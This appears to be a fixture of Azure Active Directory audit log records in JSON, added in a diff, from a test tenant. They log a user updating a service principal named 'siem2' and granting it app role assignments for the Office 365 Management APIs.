+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:37", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"NewValue": "", "OldValue": "", "Name": "Included Updated Properties"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "811fd012-35a6-4a0c-abce-79fb08b9ab6c"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:37.2595378Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34620448"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "99a3d3e3-e4f6-4de7-96e0-6333564e1b25"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.8071361Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622707"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "256e3859-87ca-4b23-b2c0-45a26ccd7925"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.8821342Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622751"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "411fc666-cabf-4cb0-b8a3-e5a2cc515b79"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.9571526Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622781"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "a4a12952-3467-4d48-9950-48b4b9ac87b3"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.8821342Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622751"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "411fc666-cabf-4cb0-b8a3-e5a2cc515b79"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": 